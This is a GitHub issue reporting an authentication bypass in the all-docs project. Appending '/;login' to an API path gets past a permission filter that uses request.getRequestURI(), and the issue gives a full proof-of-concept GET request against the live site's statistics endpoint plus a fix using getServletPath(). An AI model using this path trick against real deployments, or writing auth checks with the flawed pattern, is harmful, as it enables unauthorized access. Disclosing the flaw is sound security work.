all-docs icon indicating copy to clipboard operation
all-docs copied to clipboard
verified publisher icon Jarrettluo

Permission bypass can lead to unauthorized access

Open Redpeppersir opened this issue 1 year ago • 0 comments

Vulnerability Description: The Spring routing parser ignores any content after ; in the URL (e.g., /;login) when looking up routes, but request.getRequestURI() retrieves the full URI path. This can lead to permission bypasses and unauthorized operations. Fix Proposal: Use request.getServletPath() to obtain the path. /api/v1.0/statistics/recentDocs/;login

image

GET /api/v1.0/statistics/recentDocs/;login HTTP/1.1
Host: alldocs.tech
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: eyJhbGciO
Username: admin123
Referer: https://alldocs.tech/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

image

Redpeppersir avatar Nov 03 '24 02:11 Redpeppersir